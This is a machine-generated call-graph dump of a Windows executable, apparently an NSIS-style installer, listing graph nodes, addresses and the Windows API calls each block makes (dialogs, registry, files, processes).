SendMessageW 4247->4248 4250 4051f3 4248->4250 4251 4051d7 SendMessageW SendMessageW 4248->4251 4252 405399 GetWindowRect 4249->4252 4253 4053ac 4249->4253 4254 405206 4250->4254 4255 4051f8 SendMessageW 4250->4255 4251->4250 4256 4053b3 TrackPopupMenu 4252->4256 4253->4256 4257 403d3f 19 API calls 4254->4257 4255->4254 4256->4238 4258 4053d1 4256->4258 4259 405216 4257->4259 4260 4053ed SendMessageW 4258->4260 4261 405253 GetDlgItem SendMessageW 4259->4261 4262 40521f ShowWindow 4259->4262 4260->4260 4263 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4260->4263 4261->4238 4266 405276 SendMessageW SendMessageW 4261->4266 4264 405242 4262->4264 4265 405235 ShowWindow 4262->4265 4267 40542f SendMessageW 4263->4267 4271 403d98 SendMessageW 4264->4271 4265->4264 4266->4238 4267->4267 4268 40545a GlobalUnlock SetClipboardData CloseClipboard 4267->4268 4268->4238 4270->4228 4271->4261 4272->4227 4452 4030cf 4453 40145c 18 API calls 4452->4453 4454 4030d6 4453->4454 4456 4030dc 4454->4456 4459 4063ac GlobalAlloc lstrlenW 4454->4459 4457 4030e3 4456->4457 4486 405f51 wsprintfW 4456->4486 4460 4063e2 4459->4460 4461 406434 4459->4461 4462 40640f GetVersionExW 4460->4462 4487 40602b CharUpperW 4460->4487 4461->4456 4462->4461 4463 40643e 4462->4463 4464 406464 LoadLibraryA 4463->4464 4465 40644d 4463->4465 4464->4461 4468 406482 GetProcAddress GetProcAddress GetProcAddress 4464->4468 4465->4461 4467 406585 GlobalFree 4465->4467 4469 40659b LoadLibraryA 4467->4469 4470 4066dd FreeLibrary 4467->4470 4473 4064aa 4468->4473 4476 4065f5 4468->4476 4469->4461 4472 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4469->4472 4470->4461 4471 406651 FreeLibrary 4480 40662a 4471->4480 4472->4476 4474 4064ce FreeLibrary GlobalFree 4473->4474 4473->4476 4482 4064ea 4473->4482 4474->4461 4475 4066ea 4478 4066ef CloseHandle FreeLibrary 4475->4478 4476->4471 4476->4480 4477 4064fc lstrcpyW OpenProcess 4479 40654f CloseHandle CharUpperW lstrcmpW 4477->4479 4477->4482 4481 406704 CloseHandle 4478->4481 4479->4476 4479->4482 4480->4475 4483 406685 lstrcmpW 4480->4483 4484 4066b6 CloseHandle 4480->4484 4485 4066d4 CloseHandle 4480->4485 4481->4478 4482->4467 4482->4477 4482->4479 4483->4480 4483->4481 4484->4480 4485->4470 4486->4457 4487->4460 4488 407752 4492 407344 4488->4492 4489 407c6d 4490 4073c2 GlobalFree 4491 4073cb GlobalAlloc 4490->4491 4491->4489 4491->4492 4492->4489 4492->4490 4492->4491 4492->4492 4493 407443 GlobalAlloc 4492->4493 4494 40743a GlobalFree 4492->4494 4493->4489 4493->4492 4494->4493 4495 401dd3 4496 401446 18 API calls 4495->4496 4497 401dda 4496->4497 4498 401446 18 API calls 4497->4498 4499 4018d3 4498->4499 4507 402e55 4508 40145c 18 API calls 4507->4508 4509 402e63 4508->4509 4510 402e79 4509->4510 4511 40145c 18 API calls 4509->4511 4512 405e30 2 API calls 4510->4512 4511->4510 4513 402e7f 4512->4513 4537 405e50 GetFileAttributesW CreateFileW 4513->4537 4515 402e8c 4516 402f35 4515->4516 4517 402e98 GlobalAlloc 4515->4517 4520 4062a3 11 API calls 4516->4520 4518 402eb1 4517->4518 4519 402f2c CloseHandle 4517->4519 4538 403368 SetFilePointer 4518->4538 4519->4516 4522 402f45 4520->4522 4524 402f50 DeleteFileW 4522->4524 4525 402f63 4522->4525 4523 402eb7 4527 403336 ReadFile 4523->4527 4524->4525 4539 401435 4525->4539 4528 402ec0 GlobalAlloc 4527->4528 4529 402ed0 4528->4529 4530 402f04 WriteFile GlobalFree 4528->4530 4531 40337f 37 API calls 4529->4531 4532 40337f 37 API calls 4530->4532 4536 402edd 4531->4536 4533 402f29 4532->4533 4533->4519 4535 402efb GlobalFree 4535->4530 4536->4535 4537->4515 4538->4523 4540 404f72 25 API calls 4539->4540 4541 401443 4540->4541 4542 401cd5 4543 401446 18 API calls 4542->4543 4544 401cdd 4543->4544 4545 401446 18 API calls 4544->4545 4546 401ce8 4545->4546 4547 40145c 18 API calls 4546->4547 4548 401cf1 4547->4548 4549 401d07 lstrlenW 4548->4549 4550 401d43 4548->4550 4551 401d11 4549->4551 4551->4550 4555 406009 lstrcpynW 4551->4555 4553 401d2c 4553->4550 4554 401d39 lstrlenW 4553->4554 4554->4550 4555->4553 4556 403cd6 4557 403ce1 4556->4557 4558 403ce5 4557->4558 4559 403ce8 GlobalAlloc 4557->4559 4559->4558 4560 402cd7 4561 401446 18 API calls 4560->4561 4564 402c64 4561->4564 4562 402d99 4563 402d17 ReadFile 4563->4564 4564->4560 4564->4562 4564->4563 4565 402dd8 4566 402ddf 4565->4566 4567 4030e3 4565->4567 4568 402de5 FindClose 4566->4568 4568->4567 4569 401d5c 4570 40145c 18 API calls 4569->4570 4571 401d63 4570->4571 4572 40145c 18 API calls 4571->4572 4573 401d6c 4572->4573 4574 401d73 lstrcmpiW 4573->4574 4575 401d86 lstrcmpW 4573->4575 4576 401d79 4574->4576 4575->4576 4577 401c99 4575->4577 4576->4575 4576->4577 4279 407c5f 4280 407344 4279->4280 4281 4073c2 GlobalFree 4280->4281 4282 4073cb GlobalAlloc 4280->4282 4283 407c6d 4280->4283 4284 407443 GlobalAlloc 4280->4284 4285 40743a GlobalFree 4280->4285 4281->4282 4282->4280 4282->4283 4284->4280 4284->4283 4285->4284 4578 404363 4579 404373 4578->4579 4580 40439c 4578->4580 4582 403d3f 19 API calls 4579->4582 4581 403dca 8 API calls 4580->4581 4583 4043a8 4581->4583 4584 404380 SetDlgItemTextW 4582->4584 4584->4580 4585 4027e3 4586 4027e9 4585->4586 4587 4027f2 4586->4587 4588 402836 4586->4588 4601 401553 4587->4601 4589 40145c 18 API calls 4588->4589 4591 40283d 4589->4591 4593 4062a3 11 API calls 4591->4593 4592 4027f9 4594 40145c 18 API calls 4592->4594 4599 401a13 4592->4599 4595 40284d 4593->4595 4596 40280a RegDeleteValueW 4594->4596 4605 40149d RegOpenKeyExW 4595->4605 4597 4062a3 11 API calls 4596->4597 4600 40282a RegCloseKey 4597->4600 4600->4599 4602 401563 4601->4602 4603 40145c 18 API calls 4602->4603 4604 401589 RegOpenKeyExW 4603->4604 4604->4592 4611 401515 4605->4611 4613 4014c9 4605->4613 4606 4014ef RegEnumKeyW 4607 401501 RegCloseKey 4606->4607 4606->4613 4608 4062fc 3 API calls 4607->4608 4610 401511 4608->4610 4609 401526 RegCloseKey 4609->4611 4610->4611 4614 401541 RegDeleteKeyW 4610->4614 4611->4599 4612 40149d 3 API calls 4612->4613 4613->4606 4613->4607 4613->4609 4613->4612 4614->4611 4615 403f64 4616 403f90 4615->4616 4617 403f74 4615->4617 4619 403fc3 4616->4619 4620 403f96 SHGetPathFromIDListW 4616->4620 4626 405c84 GetDlgItemTextW 4617->4626 4622 403fad SendMessageW 4620->4622 4623 403fa6 4620->4623 4621 403f81 SendMessageW 4621->4616 4622->4619 4624 40141d 80 API calls 4623->4624 4624->4622 4626->4621 4627 402ae4 4628 402aeb 4627->4628 4629 4030e3 4627->4629 4630 402af2 CloseHandle 4628->4630 4630->4629 4631 402065 4632 401446 18 API calls 4631->4632 4633 40206d 4632->4633 4634 401446 18 API calls 4633->4634 4635 402076 GetDlgItem 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f51 wsprintfW 4636->4639 4639->4637 4640 402665 4641 40145c 18 API calls 4640->4641 4642 40266b 4641->4642 4643 40145c 18 API calls 4642->4643 4644 402674 4643->4644 4645 40145c 18 API calls 4644->4645 4646 40267d 4645->4646 4647 4062a3 11 API calls 4646->4647 4648 40268c 4647->4648 4649 4062d5 2 API calls 4648->4649 4650 402695 4649->4650 4651 4026a6 lstrlenW lstrlenW 4650->4651 4652 404f72 25 API calls 4650->4652 4655 4030e3 4650->4655 4653 404f72 25 API calls 4651->4653 4652->4650 4654 4026e8 SHFileOperationW 4653->4654 4654->4650 4654->4655 4663 401c69 4664 40145c 18 API calls 4663->4664 4665 401c70 4664->4665 4666 4062a3 11 API calls 4665->4666 4667 401c80 4666->4667 4668 405ca0 MessageBoxIndirectW 4667->4668 4669 401a13 4668->4669 4677 402f6e 4678 402f72 4677->4678 4679 402fae 4677->4679 4680 4062a3 11 API calls 4678->4680 4681 40145c 18 API calls 4679->4681 4682 402f7d 4680->4682 4687 402f9d 4681->4687 4683 4062a3 11 API calls 4682->4683 4684 402f90 4683->4684 4685 402fa2 4684->4685 4686 402f98 4684->4686 4689 4060e7 9 API calls 4685->4689 4688 403e74 5 API calls 4686->4688 4688->4687 4689->4687 4690 4023f0 4691 402403 4690->4691 4692 4024da 4690->4692 4693 40145c 18 API calls 4691->4693 4694 404f72 25 API calls 4692->4694 4695 40240a 4693->4695 4700 4024f1 4694->4700 4696 40145c 18 API calls 4695->4696 4697 402413 4696->4697 4698 402429 LoadLibraryExW 4697->4698 4699 40241b GetModuleHandleW 4697->4699 4701 40243e 4698->4701 4702 4024ce 4698->4702 4699->4698 4699->4701 4714 406365 GlobalAlloc WideCharToMultiByte 4701->4714 4703 404f72 25 API calls 4702->4703 4703->4692 4705 402449 4706 40248c 4705->4706 4707 40244f 4705->4707 4708 404f72 25 API calls 4706->4708 4710 401435 25 API calls 4707->4710 4712 40245f 4707->4712 4709 402496 4708->4709 4711 4062a3 11 API calls 4709->4711 4710->4712 4711->4712 4712->4700 4713 4024c0 FreeLibrary 4712->4713 4713->4700 4715 406390 GetProcAddress 4714->4715 4716 40639d GlobalFree 4714->4716 4715->4716 4716->4705 4717 402df3 4718 402dfa 4717->4718 4720 4019ec 4717->4720 4719 402e07 FindNextFileW 4718->4719 4719->4720 4721 402e16 4719->4721 4723 406009 lstrcpynW 4721->4723 4723->4720 4076 402175 4077 401446 18 API calls 4076->4077 4078 40217c 4077->4078 4079 401446 18 API calls 4078->4079 4080 402186 4079->4080 4081 4062a3 11 API calls 4080->4081 4085 402197 4080->4085 4081->4085 4082 4021aa EnableWindow 4084 4030e3 4082->4084 4083 40219f ShowWindow 4083->4084 4085->4082 4085->4083 4731 404077 4732 404081 4731->4732 4733 404084 lstrcpynW lstrlenW 4731->4733 4732->4733 4102 405479 4103 405491 4102->4103 4104 4055cd 4102->4104 4103->4104 4105 40549d 4103->4105 4106 40561e 4104->4106 4107 4055de GetDlgItem GetDlgItem 4104->4107 4108 4054a8 SetWindowPos 4105->4108 4109 4054bb 4105->4109 4111 405678 4106->4111 4119 40139d 80 API calls 4106->4119 4110 403d3f 19 API calls 4107->4110 4108->4109 4113 4054c0 ShowWindow 4109->4113 4114 4054d8 4109->4114 4115 405608 SetClassLongW 4110->4115 4112 403daf SendMessageW 4111->4112 4132 4055c8 4111->4132 4142 40568a 4112->4142 4113->4114 4116 4054e0 DestroyWindow 4114->4116 4117 4054fa 4114->4117 4118 40141d 80 API calls 4115->4118 4171 4058dc 4116->4171 4120 405510 4117->4120 4121 4054ff SetWindowLongW 4117->4121 4118->4106 4122 405650 4119->4122 4125 4055b9 4120->4125 4126 40551c GetDlgItem 4120->4126 4121->4132 4122->4111 4127 405654 SendMessageW 4122->4127 4123 40141d 80 API calls 4123->4142 4124 4058de DestroyWindow KiUserCallbackDispatcher 4124->4171 4181 403dca 4125->4181 4130 40554c 4126->4130 4131 40552f SendMessageW IsWindowEnabled 4126->4131 4127->4132 4129 40590d ShowWindow 4129->4132 4134 405559 4130->4134 4135 4055a0 SendMessageW 4130->4135 4136 40556c 4130->4136 4145 405551 4130->4145 4131->4130 4131->4132 4133 406805 18 API calls 4133->4142 4134->4135 4134->4145 4135->4125 4139 405574 4136->4139 4140 405589 4136->4140 4138 403d3f 19 API calls 4138->4142 4143 40141d 80 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4141 405587 4141->4125 4142->4123 4142->4124 4142->4132 4142->4133 4142->4138 4162 40581e DestroyWindow 4142->4162 4172 403d3f 4142->4172 4143->4145 4146 405590 4144->4146 4178 403d18 4145->4178 4146->4125 4146->4145 4148 405705 GetDlgItem 4149 405723 ShowWindow KiUserCallbackDispatcher 4148->4149 4150 40571a 4148->4150 4175 403d85 KiUserCallbackDispatcher 4149->4175 4150->4149 4152 40574d EnableWindow 4155 405761 4152->4155 4153 405766 GetSystemMenu EnableMenuItem SendMessageW 4154 405796 SendMessageW 4153->4154 4153->4155 4154->4155 4155->4153 4176 403d98 SendMessageW 4155->4176 4177 406009 lstrcpynW 4155->4177 4158 4057c4 lstrlenW 4159 406805 18 API calls 4158->4159 4160 4057da SetWindowTextW 4159->4160 4161 40139d 80 API calls 4160->4161 4161->4142 4163 405838 CreateDialogParamW 4162->4163 4162->4171 4164 40586b 4163->4164 4163->4171 4165 403d3f 19 API calls 4164->4165 4166 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4165->4166 4167 40139d 80 API calls 4166->4167 4168 4058bc 4167->4168 4168->4132 4169 4058c4 ShowWindow 4168->4169 4170 403daf SendMessageW 4169->4170 4170->4171 4171->4129 4171->4132 4173 406805 18 API calls 4172->4173 4174 403d4a SetDlgItemTextW 4173->4174 4174->4148 4175->4152 4176->4155 4177->4158 4179 403d25 SendMessageW 4178->4179 4180 403d1f 4178->4180 4179->4141 4180->4179 4182 403ddf GetWindowLongW 4181->4182 4192 403e68 4181->4192 4183 403df0 4182->4183 4182->4192 4184 403e02 4183->4184 4185 403dff GetSysColor 4183->4185 4186 403e12 SetBkMode 4184->4186 4187 403e08 SetTextColor 4184->4187 4185->4184 4188 403e30 4186->4188 4189 403e2a GetSysColor 4186->4189 4187->4186 4190 403e41 4188->4190 4191 403e37 SetBkColor 4188->4191 4189->4188 4190->4192 4193 403e54 DeleteObject 4190->4193 4194 403e5b CreateBrushIndirect 4190->4194 4191->4190 4192->4132 4193->4194 4194->4192 4734 4020f9 GetDC GetDeviceCaps 4735 401446 18 API calls 4734->4735 4736 402116 MulDiv 4735->4736 4737 401446 18 API calls 4736->4737 4738 40212c 4737->4738 4739 406805 18 API calls 4738->4739 4740 402165 CreateFontIndirectW 4739->4740 4741 4030dc 4740->4741 4742 4030e3 4741->4742 4744 405f51 wsprintfW 4741->4744 4744->4742 4745 4024fb 4746 40145c 18 API calls 4745->4746 4747 402502 4746->4747 4748 40145c 18 API calls 4747->4748 4749 40250c 4748->4749 4750 40145c 18 API calls 4749->4750 4751 402515 4750->4751 4752 40145c 18 API calls 4751->4752 4753 40251f 4752->4753 4754 40145c 18 API calls 4753->4754 4755 402529 4754->4755 4756 40253d 4755->4756 4757 40145c 18 API calls 4755->4757 4758 4062a3 11 API calls 4756->4758 4757->4756 4759 40256a CoCreateInstance 4758->4759 4760 40258c 4759->4760 4761 40497c GetDlgItem GetDlgItem 4762 4049d2 7 API calls 4761->4762 4767 404bea 4761->4767 4763 404a76 DeleteObject 4762->4763 4764 404a6a SendMessageW 4762->4764 4765 404a81 4763->4765 4764->4763 4768 404ab8 4765->4768 4770 406805 18 API calls 4765->4770 4766 404ccf 4769 404d74 4766->4769 4774 404bdd 4766->4774 4779 404d1e SendMessageW 4766->4779 4767->4766 4777 40484e 5 API calls 4767->4777 4790 404c5a 4767->4790 4773 403d3f 19 API calls 4768->4773 4771 404d89 4769->4771 4772 404d7d SendMessageW 4769->4772 4776 404a9a SendMessageW SendMessageW 4770->4776 4781 404da2 4771->4781 4782 404d9b ImageList_Destroy 4771->4782 4792 404db2 4771->4792 4772->4771 4778 404acc 4773->4778 4780 403dca 8 API calls 4774->4780 4775 404cc1 SendMessageW 4775->4766 4776->4765 4777->4790 4783 403d3f 19 API calls 4778->4783 4779->4774 4785 404d33 SendMessageW 4779->4785 4786 404f6b 4780->4786 4787 404dab GlobalFree 4781->4787 4781->4792 4782->4781 4788 404add 4783->4788 4784 404f1c 4784->4774 4793 404f31 ShowWindow GetDlgItem ShowWindow 4784->4793 4789 404d46 4785->4789 4787->4792 4791 404baa GetWindowLongW SetWindowLongW 4788->4791 4800 404ba4 4788->4800 4803 404b39 SendMessageW 4788->4803 4804 404b67 SendMessageW 4788->4804 4805 404b7b SendMessageW 4788->4805 4799 404d57 SendMessageW 4789->4799 4790->4766 4790->4775 4794 404bc4 4791->4794 4792->4784 4795 404de4 4792->4795 4798 40141d 80 API calls 4792->4798 4793->4774 4796 404be2 4794->4796 4797 404bca ShowWindow 4794->4797 4808 404e12 SendMessageW 4795->4808 4811 404e28 4795->4811 4813 403d98 SendMessageW 4796->4813 4812 403d98 SendMessageW 4797->4812 4798->4795 4799->4769 4800->4791 4800->4794 4803->4788 4804->4788 4805->4788 4806 404ef3 InvalidateRect 4806->4784 4807 404f09 4806->4807 4814 4043ad 4807->4814 4808->4811 4810 404ea1 SendMessageW SendMessageW 4810->4811 4811->4806 4811->4810 4812->4774 4813->4767 4815 4043cd 4814->4815 4816 406805 18 API calls 4815->4816 4817 40440d 4816->4817 4818 406805 18 API calls 4817->4818 4819 404418 4818->4819 4820 406805 18 API calls 4819->4820 4821 404428 lstrlenW wsprintfW SetDlgItemTextW 4820->4821 4821->4784 4822 4026fc 4823 401ee4 4822->4823 4825 402708 4822->4825 4823->4822 4824 406805 18 API calls 4823->4824 4824->4823 4274 4019fd 4275 40145c 18 API calls 4274->4275 4276 401a04 4275->4276 4277 405e7f 2 API calls 4276->4277 4278 401a0b 4277->4278 4826 4022fd 4827 40145c 18 API calls 4826->4827 4828 402304 GetFileVersionInfoSizeW 4827->4828 4829 40232b GlobalAlloc 4828->4829 4833 4030e3 4828->4833 4830 40233f GetFileVersionInfoW 4829->4830 4829->4833 4831 402350 VerQueryValueW 4830->4831 4832 402381 GlobalFree 4830->4832 4831->4832 4835 402369 4831->4835 4832->4833 4839 405f51 wsprintfW 4835->4839 4837 402375 4840 405f51 wsprintfW 4837->4840 4839->4837 4840->4832 4841 402afd 4842 40145c 18 API calls 4841->4842 4843 402b04 4842->4843 4848 405e50 GetFileAttributesW CreateFileW 4843->4848 4845 402b10 4846 4030e3 4845->4846 4849 405f51 wsprintfW 4845->4849 4848->4845 4849->4846 4850 4029ff 4851 401553 19 API calls 4850->4851 4852 402a09 4851->4852 4853 40145c 18 API calls 4852->4853 4854 402a12 4853->4854 4855 402a1f RegQueryValueExW 4854->4855 4857 401a13 4854->4857 4856 402a3f 4855->4856 4860 402a45 4855->4860 4856->4860 4861 405f51 wsprintfW 4856->4861 4859 4029e4 RegCloseKey 4859->4857 4860->4857 4860->4859 4861->4860 4862 401000 4863 401037 BeginPaint GetClientRect 4862->4863 4864 40100c DefWindowProcW 4862->4864 4866 4010fc 4863->4866 4867 401182 4864->4867 4868 401073 CreateBrushIndirect FillRect DeleteObject 4866->4868 4869 401105 4866->4869 4868->4866 4870 401170 EndPaint 4869->4870 4871 40110b CreateFontIndirectW 4869->4871 4870->4867 4871->4870 4872 40111b 6 API calls 4871->4872 4872->4870 4873 401f80 4874 401446 18 API calls 4873->4874 4875 401f88 4874->4875 4876 401446 18 API calls 4875->4876 4877 401f93 4876->4877 4878 401fa3 4877->4878 4879 40145c 18 API calls 4877->4879 4880 401fb3 4878->4880 4881 40145c 18 API calls 4878->4881 4879->4878 4882 402006 4880->4882 4883 401fbc 4880->4883 4881->4880 4885 40145c 18 API calls 4882->4885 4884 401446 18 API calls 4883->4884 4887 401fc4 4884->4887 4886 40200d 4885->4886 4888 40145c 18 API calls 4886->4888 4889 401446 18 API calls 4887->4889 4890 402016 FindWindowExW 4888->4890 4891 401fce 4889->4891 4895 402036 4890->4895 4892 401ff6 SendMessageW 4891->4892 4893 401fd8 SendMessageTimeoutW 4891->4893 4892->4895 4893->4895 4894 4030e3 4895->4894 4897 405f51 wsprintfW 4895->4897 4897->4894 4898 402880 4899 402884 4898->4899 4900 40145c 18 API calls 4899->4900 4901 4028a7 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028b1 4902->4903 4904 4028ba RegCreateKeyExW 4903->4904 4905 4028e8 4904->4905 4912 4029ef 4904->4912 4906 402934 4905->4906 4907 40145c 18 API calls 4905->4907 4908 402963 4906->4908 4911 401446 18 API calls 4906->4911 4910 4028fc lstrlenW 4907->4910 4909 4029ae RegSetValueExW 4908->4909 4913 40337f 37 API calls 4908->4913 4916 4029c6 RegCloseKey 4909->4916 4917 4029cb 4909->4917 4914 402918 4910->4914 4915 40292a 4910->4915 4918 402947 4911->4918 4919 40297b 4913->4919 4920 4062a3 11 API calls 4914->4920 4921 4062a3 11 API calls 4915->4921 4916->4912 4922 4062a3 11 API calls 4917->4922 4923 4062a3 11 API calls 4918->4923 4929 406224 4919->4929 4925 402922 4920->4925 4921->4906 4922->4916 4923->4908 4925->4909 4928 4062a3 11 API calls 4928->4925 4930 406247 4929->4930 4931 40628a 4930->4931 4932 40625c wsprintfW 4930->4932 4933 402991 4931->4933 4934 406293 lstrcatW 4931->4934 4932->4931 4932->4932 4933->4928 4934->4933 4935 402082 4936 401446 18 API calls 4935->4936 4937 402093 SetWindowLongW 4936->4937 4938 4030e3 4937->4938 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3712 406038 3546->3712 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3721 406722 lstrlenW CharPrevW 3549->3721 3728 405e50 GetFileAttributesW CreateFileW 3554->3728 3556 4035c7 3577 4035d7 3556->3577 3729 406009 lstrcpynW 3556->3729 3558 4035ed 3730 406751 lstrlenW 3558->3730 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3737 4032d2 3563->3737 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3771 403368 SetFilePointer 3565->3771 3748 403368 SetFilePointer 3567->3748 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3749 40337f 3571->3749 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3735 403336 ReadFile 3576->3735 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 406a99 lstrcpyW 3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 